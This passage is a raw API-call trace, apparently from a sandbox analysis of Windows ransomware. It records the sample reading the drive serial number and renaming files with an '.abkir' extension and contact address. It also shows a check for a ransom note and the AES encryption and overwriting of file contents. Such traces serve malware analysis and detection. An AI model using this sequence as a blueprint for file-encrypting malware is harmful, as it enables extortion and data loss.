puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.676] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0208.676] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0208.676] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0208.676] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.677] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6024fa8) returned 0x0 [0208.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6024fa8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0208.677] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024fa8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x6027460) returned 0x0 [0208.677] WbemLocator:IUnknown:Release (This=0x6024fa8) returned 0x0 [0208.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x6027460) returned 0x0 [0208.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0208.678] WbemLocator:IUnknown:AddRef (This=0x6027460) returned 0x3 [0208.678] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0208.678] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0208.678] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0208.678] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0208.678] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0208.678] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0208.678] WbemLocator:IUnknown:Release (This=0x6027460) returned 0x2 [0208.678] WbemLocator:IUnknown:Release (This=0x6027460) returned 0x1 [0208.678] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0208.678] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0208.678] WbemLocator:IUnknown:QueryInterface (in: This=0x6027460, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x6027460) returned 0x0 [0208.678] WbemLocator:IUnknown:AddRef (This=0x6027460) returned 0x3 [0208.678] WbemLocator:IUnknown:Release (This=0x6027460) returned 0x2 [0208.678] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0208.678] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0208.678] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.678] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x60271b0) returned 0x0 [0208.678] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271b0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x6033634) returned 0x0 [0209.022] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5bd64) returned 0x0 [0209.022] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x6033634, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0209.022] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0209.022] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5bd84) returned 0x0 [0209.023] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5bd64) returned 0x0 [0209.023] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x6033634, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.023] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0209.023] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0209.023] CoTaskMemFree (pv=0xbd4a68) [0209.023] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x0 [0209.023] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5bd84) returned 0x0 [0209.023] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0209.024] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0209.024] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0209.024] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0209.025] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0209.025] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5bce4) returned 0x0 [0209.025] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.025] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0209.025] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0209.025] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0209.025] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5bd6c) returned 0x0 [0209.026] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0209.026] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0209.026] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0209.026] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0209.026] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0209.026] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x6033634) returned 0x0 [0209.026] WbemLocator:IUnknown:AddRef (This=0x6033634) returned 0x4 [0209.026] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x3 [0209.026] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x2 [0209.026] SysStringLen (param_1=0x0) returned 0x0 [0209.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0209.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0209.027] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.027] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0209.027] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0209.027] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5bd84) returned 0x0 [0209.027] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0209.027] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0209.027] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0209.027] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.027] IWbemServices:GetObject (in: This=0x6033634, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028b10, ppCallResult=0x0) returned 0x0 [0209.233] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0209.233] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0209.234] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.234] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3676fec*=0, plFlavor=0x3676ff0*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3676fec*=8, plFlavor=0x3676ff0*=0) returned 0x0 [0209.234] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.234] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.234] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3676fec*=8, plFlavor=0x3676ff0*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3676fec*=8, plFlavor=0x3676ff0*=0) returned 0x0 [0209.234] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.234] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x38 [0209.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x5b [0209.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0209.234] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35f59ba0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0209.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0209.235] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0209.236] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x36 [0209.236] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0209.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0209.236] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32cea980, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32cea980, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32cea980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0209.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0209.236] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x36 [0209.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0209.236] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x3677500 | out: lpFileInformation=0x3677500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0209.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0209.237] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x36 [0209.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0209.238] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0209.238] GetFileType (hFile=0x32c) returned 0x1 [0209.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0209.238] GetFileType (hFile=0x32c) returned 0x1 [0209.238] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x627e [0209.238] ReadFile (in: hFile=0x32c, lpBuffer=0x3677700, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x3677700*, lpNumberOfBytesRead=0x691f33c*=0x627e, lpOverlapped=0x0) returned 1 [0209.258] CloseHandle (hObject=0x32c) returned 1 [0209.258] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbdf9d0) returned 1 [0209.259] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x367e044 | out: pbBuffer=0x367e044) returned 1 [0209.450] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x393cec4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f250) returned 1 [0209.450] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.450] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.450] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7f150) returned 1 [0209.450] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.451] CryptSetKeyParam (hKey=0xb7f150, dwParam=0x4, pbData=0x393cfa4*=0x1, dwFlags=0x0) returned 1 [0209.451] CryptSetKeyParam (hKey=0xb7f150, dwParam=0x1, pbData=0x393cf70, dwFlags=0x0) returned 1 [0209.451] CryptEncrypt (in: hKey=0xb7f150, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x393cfb4*, pdwDataLen=0x691f308*=0x6280, dwBufLen=0x6280 | out: pbData=0x393cfb4*, pdwDataLen=0x691f308*=0x6280) returned 1 [0209.451] CryptEncrypt (in: hKey=0xb7f150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3943258*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x3943258*, pdwDataLen=0x691f310*=0x10) returned 1 [0209.452] CryptDestroyKey (hKey=0xb7f250) returned 1 [0209.452] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0209.452] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0209.452] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x36 [0209.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0209.453] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0209.454] GetFileType (hFile=0x320) returned 0x1 [0209.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0209.454] GetFileType (hFile=0x320) returned 0x1 [0209.454] WriteFile (in: hFile=0x320, lpBuffer=0x3943874*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x3943874*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0209.455] CloseHandle (hObject=0x320) returned 1 [0209.455] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0209.455] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0209.455] CoTaskMemFree (pv=0xbed438) [0209.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0209.455] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0209.456] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0209.456] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, 